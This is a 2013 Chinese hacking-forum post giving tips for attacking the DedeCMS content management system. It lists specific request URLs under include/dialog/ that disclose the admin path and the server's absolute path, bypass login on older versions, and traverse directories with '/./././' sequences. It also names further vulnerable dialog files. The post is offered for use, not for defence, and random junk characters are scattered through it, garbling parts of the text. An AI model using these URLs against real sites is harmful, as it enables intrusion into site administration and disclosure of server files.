找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2215|回复: 0
打印 上一主题 下一主题

dedecms爆后台文件技巧

[复制链接]
跳转到指定楼层
楼主
发表于 2013-4-16 16:50:43 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
1.include/dialog/select_soft.php文件可以爆出DEDECMS的后台,以前的老板本可以跳过登陆验证直接访问,无需管理) A+ @* K) |  u, n, w* b, F

% f0 M2 [. M/ u: }  M" a5 n员帐号,新版本的就直接转向了后台.
) Y, g' H+ `( l" ]2 c, ?  k; {" ~* ^% ^% b' O
2.include/dialog/config.php会爆出后台管理路径) n  x" P, a/ \

3 K% q2 k" V2 x( X4 ~3.include/dialog/select_soft.php?activepath=/include/FCKeditor 跳转目录
: _9 o9 S  p4 t8 d
; I. _& H# i" G1 _& Y) a$ F- E4.include/dialog/select_soft.php?activepath=/st0pst0pst0pst0pst0pst0pst0pst0p 爆出网站绝对路径.: C1 j5 [# S9 J, G

, w; ^% P# M& _+ K5.另外一些低版本的DEDECMS访问这个页面的时候会直接跳过登陆验证,直接显示,而且还可以用/././././././././掉
2 J3 }. }* [8 }; |' r1 |1 ?! e: d
到根目录去.不过这些版本的访问地址有些不同.
6 U4 _; G  ^( p- Z- H* ?* c1 H地址为require/dialog/select_soft.php?activepath=/././././././././
! }* A1 l$ G* @, X+ Y3 i5 C; b% l* m" O3 ]5 v& @
include\dialog\目录下的另外几个文件都存在同一个问题,只是默认设的目录不同.有些可以查看HTML这些文件哦..8 n8 d$ j# d6 U0 t4 b
存在相同问题的文件还有9 R7 E8 V' p2 S" T3 ?" e5 b
include\dialog\select_images.php$ y% B" _. d9 r% O5 B
include\dialog\select_media.php& Z+ W6 p" `$ p  w2 b9 X/ x; x
include\dialog\select_templets.php​
; y. D) x: b! [' S; q  n
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表